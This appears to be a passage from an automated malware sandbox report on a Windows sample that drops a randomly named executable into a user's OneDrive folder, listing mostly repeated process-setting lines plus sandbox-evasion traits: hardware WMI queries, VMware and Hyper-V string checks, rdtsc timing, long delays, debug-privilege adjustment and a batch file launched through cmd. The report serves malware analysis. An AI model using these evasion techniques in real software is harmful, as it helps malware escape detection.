                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Code function: 34_2_00007FFAAC82167B rdtsc 34_2_00007FFAAC82167B
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe File opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe File opened: C:\Users\user
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe File opened: C:\Users\user\AppData\Local
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe File opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe File opened: C:\Users\user\AppData
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe File opened: C:\Users\user\Desktop\desktop.ini
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1725545102.000000001B07D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1986309104.000000001BB47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1986309104.000000001BB89000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}llowlong
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2105070637.000000001BCA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2277347660.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2414905339.0000000001396000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2101207738.000000001B004000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1728404902.000000001BE34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x/
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lsJ5e1BbImAprKPVMX86
                            Source: w32tm.exe, 00000006.00000002.1409957928.0000023A9CB99000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1464472681.000000001B6D0000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBFE000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000013.00000002.1644878978.000001A7B5519000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1677912049.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1863112684.000000001BC04000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001F.00000002.1893090388.00000289C1B79000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002D.00000002.2120698046.000001A627FA9000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2223790602.000000001BEE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Process information queried: ProcessInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Code function: 34_2_00007FFAAC82167B rdtsc 34_2_00007FFAAC82167B
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Process token adjusted: Debug
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Memory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
